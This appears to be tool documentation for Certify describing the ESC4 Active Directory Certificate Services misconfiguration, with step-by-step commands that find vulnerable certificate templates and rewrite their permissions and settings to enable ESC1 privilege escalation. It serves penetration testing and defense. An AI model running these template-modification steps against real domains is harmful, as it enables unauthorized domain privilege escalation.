Skip to main content
ESC4 is a misconfiguration in Active Directory Certificate Services (AD CS), which stems from overly permissive access controls on certificate template domain objects. Specifically, if a principal has the privileges to control the attributes of a certificate template object, they can modify the template to match the abuse criteria for any of the following escalation techniques:
ESC4 can be leveraged to enable the following escalation techniques:
Any of the following rights, when misconfigured, comprise an ESC4 vulnerability:
RightDescription
OwnerThe principal has implicit full control of the object and can edit any property.
Full ControlThe principal has full control of the object and can edit any property.
Write PropertyThe principal has generic write on the object and can edit any property.
Write OwnerThe principal can change the owner of the object.
Write DaclThe principal can modify the access controls of the object.
We can search for certificate templates with misconfigured access controls using the enum-templates --filter-vulnerable command from Certify. For more information about the command and its parameters, please refer to the Command Overview page. 
Certify.exe enum-templates --filter-enabled --filter-vulnerable --hide-admins
As seen in the Object Control Permissions section, arbitrary principals can have delegated rights on certificate template objects. The abuse scenario for this vulnerability can vary depending on the delegated permission, but the overall idea is to modify a template so it can facilitate another escalation technique and then carrying out the abuse scenario for the respective technique.

Full Control / Write Property

If a principal has Full Control or Write Property rights, they have the ability to edit any property on the certificate template domain object, making it fairly straight forward to obtain the desirable abuse scenario conditions.
We need to perform the following steps to modify the certificate template to allow the ESC1 abuse scenario:
  • Ensure that our principal has enrollment rights. This can be granted/revoked using the following Certify command:
    • Certify.exe manage-template --template <template> --enroll <sid>
  • Ensure that manager approval is disabled. This can be toggled on/off using the following Certify command:
    • Certify.exe manage-template --template <template> --manager-approval
  • Ensure that authorized signatures are disabled. This can be set using the following Certify command:
    • Certify.exe manage-template --template <template> --authorized-signatures 0
  • Ensure that the template supports client authentication. This can be toggled on/off using the following Certify command:
    • Certify.exe manage-template --template <template> --client-auth --pkinit-auth --smartcard-logon
  • Ensure that the enrollees can supply subject details. This can be toggled on/off using the following Certify command:
    • Certify.exe manage-template --template <template> --supply-subject
For more information about the manage-template command and its parameters, please refer to the Command Overview page. 
Certify.exe enum-templates --filter-enabled --filter-vulnerable --hide-admins
Once the template fits the abuse criteria for ESC1, it is possible to carry out the respective abuse scenario.

Owner / Write Dacl

If a principal has Owner or Write Dacl rights, they can modify the access controls of the certificate template domain object. This can be leveraged to grant a principal the Write Property right using the following Certify command:
  • Certify.exe manage-template --template <template> --write-property <sid>
Certify.exe manage-template --template CustomInsecure --write-property S-1-5-11
Now that we have obtained Write Property rights, we can circle back to Full Control / Write Property.

Write Owner

If a principal has Write Owner rights, they can modify the owner of the certificate template domain object. This can be leveraged to grant a principal the Owner right using the following Certify command:
  • Certify.exe manage-template --template <template> --owner <sid>
Certify.exe manage-template --template CustomInsecure --owner S-1-5-11
Now that we have obtained Owner rights, we can circle back to Owner / Write Dacl.